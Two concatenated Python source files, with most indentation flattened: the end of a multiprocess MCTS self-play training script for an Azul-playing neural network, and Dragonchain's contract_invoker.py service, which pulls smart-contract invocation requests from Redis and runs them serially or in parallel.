        print('policy_loss:',policy_loss)
print('value_loss:',value_loss)
print('reg_loss:',reg_loss)
print('loss:',loss)
print('\n')
self.save()
def save(self, path="./model/latest.ckpt"):
self._saver.save(self._sess, path)
def restore(self, path="./model/latest.ckpt"):
self._saver.restore(self._sess, path)
def close(self):
self._sess.close()
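# Minimal usage sketch (the all-zero state and all-ones mask below are dummy
# stand-ins for a real encoded Azul position):
#     net = InferenceNetwork(STATES_SIZE, MASK_SIZE)
#     value, policy = net.predict(np.zeros((1, STATES_SIZE)), np.ones((1, MASK_SIZE)))
#     net.close()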
class InfHelper(object):
"""docstring for InfHelper"""
def __init__(self, w2s_conn):
self._w2s_conn = w2s_conn
def __call__(self, game):
self._w2s_conn.send((game.states(), game.flat_mask(), False))
value, prior = self._w2s_conn.recv()
return value, prior
class InfHelperS(object):
"""docstring for InfHelperS"""
def __init__(self, state_size = STATES_SIZE, mask_size = MASK_SIZE):
self._infnet = InferenceNetwork(state_size,mask_size)
def __call__(self,game):
states = game.states().reshape([1,-1])
mask = game.flat_mask().reshape([1,-1])
return self._infnet.predict(states,mask)
def worker_routine(game, w2s_conn, public_q):
commands = np.argwhere(np.ones((6,5,6))==1)
inf_helper = InfHelper(w2s_conn)
search = mcts.MCTSearch(game, inf_helper, commands)
accumulated_data = []
winner = None
while True:
action_command, training_data = search.start_search(300)
accumulated_data.append(training_data)
is_turn_end = game.take_command(action_command)
if is_turn_end:
game.turn_end(verbose = False)
if game.is_terminal:
game.final_score(verbose=True)
w2s_conn.send([True]*3)
winner = game.leading_player_num
print('end in', game.turn)
break
else:
game.start_turn()
if game.turn >= 11:
w2s_conn.send([True]*3)
game.final_score()
winner = game.leading_player_num
print('exceeding turn 10')
break
search = mcts.MCTSearch(game, inf_helper, commands)
else:
##########################
search.change_root()
# search = mcts.MCTSearch(game, inf_helper, commands)
#########################
state_data,action_data,value_data,mask_data = [],[],[],[]
for state, action_index, player,mask in accumulated_data:
state_data.append(state)
action_data.append(action_index)
mask_data.append(mask)
if player == winner:
value_data.append(1.)
else:
value_data.append(-1.)
public_q.put((state_data,action_data,value_data,mask_data))
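# worker_routine plays one complete self-play game: every MCTS step records a
# (state, action_index, player, mask) tuple, and once the winner is known each
# position is labelled +1 if it belongs to the winner and -1 otherwise before
# the whole batch is pushed onto the shared queue.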
def server_routine(s2w_conns, num_processes=8):
infnet = InferenceNetwork(STATES_SIZE, MASK_SIZE)
    done_flags = [False] * num_processes
dummy = azul.Azul(2)
dummy.start()
dummy_status = (dummy.states(), dummy.flat_mask())
while True:
if all(done_flags):
break
states,masks = [],[]
for i in range(num_processes):
if done_flags[i]:
state, mask = dummy_status
else:
state, mask, flag = s2w_conns[i].recv()
                if flag:
done_flags[i] = True
state, mask = dummy_status
states.append(state)
masks.append(mask)
states = np.stack(states, axis=0)
masks = np.stack(masks, axis=0)
values, priors = infnet.predict(states, masks)
for i in range(num_processes):
if not done_flags[i]:
s2w_conns[i].send((values[i], priors[i]))
infnet.close()
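# server_routine batches one pending request per worker into a single predict()
# call, substituting a dummy position for workers that have already finished,
# and scatters the resulting (value, prior) pairs back over the pipes.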
def self_play():
processes = []
s2w_conns = []
public_q = Queue()
# define workers
for i in range(8):
game = azul.Azul(2)
game.start()
w2s_conn, s2w_conn = Pipe()
s2w_conns.append(s2w_conn)
p = Process(target=worker_routine, args=(game, w2s_conn, public_q))
processes.append(p)
# define server
server = Process(target=server_routine, args=(s2w_conns,))
# start process
server.start()
for p in processes:
p.start()
min_length = 999
all_data = []
for i in range(8):
state_data,action_data,value_data,mask_data = public_q.get()
if len(state_data) <= min_length:
min_length = len(state_data)
all_data.append((state_data,action_data,value_data,mask_data))
state_data_all,action_data_all,value_data_all,mask_data_all = [],[],[],[]
for state_data,action_data,value_data,mask_data in all_data:
data_zip = list(zip(state_data,action_data,value_data,mask_data))
random.shuffle(data_zip)
state_data,action_data,value_data,mask_data = list(zip(*data_zip))
state_data_all.extend(state_data[:min_length])
action_data_all.extend(action_data[:min_length])
value_data_all.extend(value_data[:min_length])
mask_data_all.extend(mask_data[:min_length])
state_data_all = np.stack(state_data_all)
action_data_all = np.stack(action_data_all)
value_data_all = np.stack(value_data_all).reshape((-1,1))
mask_data_all = np.stack(mask_data_all)
assert len(state_data_all) == len(action_data_all) and len(state_data_all) == len(value_data_all) and len(state_data_all) == len(mask_data_all)
permutated_index = np.random.permutation(len(state_data_all))
permutated_state = state_data_all[permutated_index]
permutated_action = action_data_all[permutated_index]
permutated_value = value_data_all[permutated_index]
permutated_mask = mask_data_all[permutated_index]
for p in processes:
p.join()
server.join()
num_iter = len(permutated_state)//BATCH_SIZE
infnet = InferenceNetwork(STATES_SIZE, MASK_SIZE)
for i in range(num_iter):
infnet.train(permutated_state[i*BATCH_SIZE:(i+1)*BATCH_SIZE],
permutated_action[i*BATCH_SIZE:(i+1)*BATCH_SIZE],permutated_value[i*BATCH_SIZE:(i+1)*BATCH_SIZE],
permutated_mask[i*BATCH_SIZE:(i+1)*BATCH_SIZE])
print(i)
infnet.close()
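# Training sketch: every game's samples are truncated to the length of the
# shortest game (presumably to keep games equally weighted), shuffled jointly,
# and fed to the network in BATCH_SIZE mini-batches; InferenceNetwork.train()
# saves a checkpoint after each step.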
def debug():
game = azul.Azul(2)
game.start()
commands = np.argwhere(np.ones((6,5,6))==1)
inf_helper = InfHelperS()
search = mcts.MCTSearch(game, inf_helper, commands)
searches= [search]
accumulated_data = []
winner = None
while True:
action_command, training_data = search.start_search(300)
accumulated_data.append(training_data)
is_turn_end = game.take_command(action_command)
if is_turn_end:
game.turn_end(verbose = False)
if game.is_terminal:
game.final_score()
winner = game.leading_player_num
break
else:
game.start_turn()
search = mcts.MCTSearch(game, inf_helper, commands)
else:
# search.change_root()
search = mcts.MCTSearch(game, inf_helper, commands)
searches.append(search)
state_data,action_data,value_data = [],[],[]
for state, action_index, player in accumulated_data:
state_data.append(state)
action_index = str(action_index//30) + str((action_index%30)//6) + str(action_index%6)
action_data.append(action_index)
if player == winner:
value_data.append(1.)
else:
value_data.append(-1.)
return state_data,action_data,value_data,searches
if __name__ == '__main__':
self_play()
# state_data,action_data,value_data,searches = debug()
# print(value_data)
# print(action_data)
# for search in searches:
# print(search._root.visit_count)
# print(search._root.prior.reshape((6,5,6)))
# print(search._root.child_Ws.reshape((6,5,6)),search._root.child_Ns.reshape((6,5,6)))
# print('\n\n')
|
contract_invoker.py
|
# Copyright 2019 Dragonchain, Inc.
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
# You may obtain a copy of the Apache License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
import json
import random
import asyncio
from queue import Queue
from threading import Thread
import aiohttp
import fastjsonschema
from dragonchain.lib.dto import schema
from dragonchain.lib.dao import smart_contract_dao
from dragonchain.lib.database import redis
from dragonchain.contract_invoker import contract_invoker_service
from dragonchain import logger
from dragonchain.lib import error_reporter
_log = logger.get_logger()
_serial_worker_threads: dict = {}
_serial_queues: dict = {}
_validate_sc_invoke_request = fastjsonschema.compile(schema.smart_contract_invoke_request_schema)
def setup() -> None:
_log.info("Initializing contract service...")
restart_dead_workers()
_log.info("Service initialized!")
async def start() -> None:
_log.info("Checking for any previously in-process SC invocations that need to be re-queued")
# Recover contracts that didn't finish processing (in case of crash, etc)
events = await redis.hgetall_async("mq:contract-processing", decode=False)
event_list = []
for _, value in events.items():
event_list.append(value)
if event_list:
# Push them to the front of the queue, and reset current processing list
await redis.rpush_async("mq:contract-invoke", *event_list)
await redis.delete_async("mq:contract-processing")
_log.info("Starting event loop")
session = aiohttp.ClientSession()
try:
while True:
await process_events(session)
except Exception:
await session.close()
raise
async def process_events(session: aiohttp.ClientSession) -> None:
try:
unique_id = str(random.randint(0, 9999999999999)) # nosec (not needed for cryptographic purposes)
_, event = await redis.brpop_async("mq:contract-invoke", timeout=0, decode=False)
# Place into in process queue for safety (deleted after contract finishes invoking)
await redis.hset_async("mq:contract-processing", unique_id, event)
_log.info(f"Receieved contract invocation request {event}")
event = json.loads(event)
_validate_sc_invoke_request(event)
event["unique_id"] = unique_id
except Exception:
await redis.hdel_async("mq:contract-processing", unique_id)
_log.exception("Invalid contract invocation request")
raise
# Invoke the contract!
if event["execution_order"] == "parallel":
# Invoke the contract asynchronously with the event loop. "fire-and-forget"
asyncio.create_task(contract_invoker_service.invoke(session, event))
elif event["execution_order"] == "serial":
_log.info(f"Executing contract {event['contract_id']} as serial")
# Ensure the worker is running
existing_thread = _serial_worker_threads.get(event["contract_id"])
if not existing_thread or not existing_thread.is_alive():
restart_serial_worker(event["contract_id"])
# Queue the actual job for the serial worker
_serial_queues[event["contract_id"]].put(event, block=False)
else:
_log.warning(f"Invalid execution order on invocation request: {event}")
# TODO: Push event to failed queue.
def restart_serial_worker(contract_id: str) -> None:
_log.info(f"Restarting worker {contract_id}")
_serial_queues[contract_id] = Queue()
_serial_worker_threads[contract_id] = Thread(target=asyncio.run, args=[serial_contract_worker(contract_id)], daemon=True)
_serial_worker_threads[contract_id].start()
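# Each serial contract gets its own FIFO queue and a daemon thread running
# serial_contract_worker() under asyncio.run, so invocations of that contract
# never overlap; parallel contracts are instead scheduled as fire-and-forget
# asyncio tasks in process_events().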
def restart_dead_workers() -> None:
for contract in smart_contract_dao.get_serial_contracts():
restart_serial_worker(contract.id)
async def serial_contract_worker(contract_id: str) -> None:
session = aiohttp.ClientSession()
_log.info(f"Worker started for contract {contract_id}")
while True:
try:
event = _serial_queues[contract_id].get(block=True) # Blocks until receives from queue
_log.info(f"Executing {contract_id}")
await contract_invoker_service.invoke(session, event)
except Exception:
_log.exception("Error invoking serial contract")
def error_handler(loop: "asyncio.AbstractEventLoop", context: dict) -> None:
exception = context.get("exception")
if exception:
message = error_reporter.get_exception_message(exception)
error_reporter.report_exception(exception, message)
loop.stop()
loop.close()
if __name__ == "__main__":
try:
setup()
event_loop = asyncio.get_event_loop()
event_loop.set_exception_handler(error_handler)
event_loop.run_until_complete(start())
except Exception as e:
error_reporter.report_exception(e, "Error running contract invoker")
raise
|